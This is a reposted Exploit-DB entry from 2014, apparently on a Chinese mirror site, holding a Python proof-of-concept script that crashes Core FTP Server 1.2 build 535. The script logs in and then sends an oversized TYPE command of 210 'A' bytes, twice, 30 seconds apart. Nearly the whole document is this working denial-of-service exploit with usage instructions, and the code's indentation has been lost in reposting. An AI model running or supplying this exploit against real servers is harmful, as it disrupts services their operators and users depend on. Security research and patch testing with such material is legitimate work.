Core FTP Server 1.2 build 535 (32-bi)t – Crash (PoC) - 体验盒子

作者： Kaczinski Ramirez
日期： 2014-05-24
类别：
dos
平台：
windows
来源：https://www.exploit-db.com/exploits/33495/
#!/usr/bin/python

import socket,sys,time

def Usage():
print ("Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.")
print ("Usage: ./coreftp_dos.py <host> <port> <username> <password>")
print ("Ex:./coreftp_dos.py 192.168.10.10 21 ftp ftp\n")

if len(sys.argv) <> 5:
Usage()
sys.exit(1)
else:
host=sys.argv[1]
port=sys.argv[2]
user=sys.argv[3]
passwd=sys.argv[4]
evil = '\x41' * 210
print "[+] Trying to crash Core FTP server with " + str(len(evil)) + " buffer bytes"
print "[+] Host: " + host + " Port: " + port + " User: " + user + " Pass: " + passwd
print "[+] Attempting to connect to the remote Core FTP Server..."
first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port=int(port)
try:
connect = first.connect((host, port))
except:
print "[-] There was an error while trying to connect to the remote FTP Server"
sys.exit(1)
print "[+] Connection to remote server successfully... now trying to authenticate"
first.recv(1024)
first.send('USER ' + user + '\r\n')
first.recv(1024)
first.send('PASS ' + passwd + '\r\n')
first.recv(1024)
first.send('dir\r\n');
first.send('TYPE ' + evil + '\r\n')
try:
first.recv(1024)
except:
print "[-] Couldn\'t authenticate in the remote FTP server"
sys.exit(1)
print "[+] First buffer was sent, waiting 30 seconds to send a second time with some more bad data..."
first.close()
second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(30)
try:
connect = second.connect((host, port))
except:
print "[-] FTP Server isn\'t responding... it might had successfully crashed."
sys.exit(1)
second.send('USER ' + user + '\r\n')
second.recv(1024)
second.send('PASS ' + passwd + '\r\n')
second.recv(1024)
second.send('TYPE ' + evil + '\r\n')
second.recv(1024)
print "[+] By now, Core FTP Server should had crashed and will not accept new connections."
second.close()
sys.exit(0)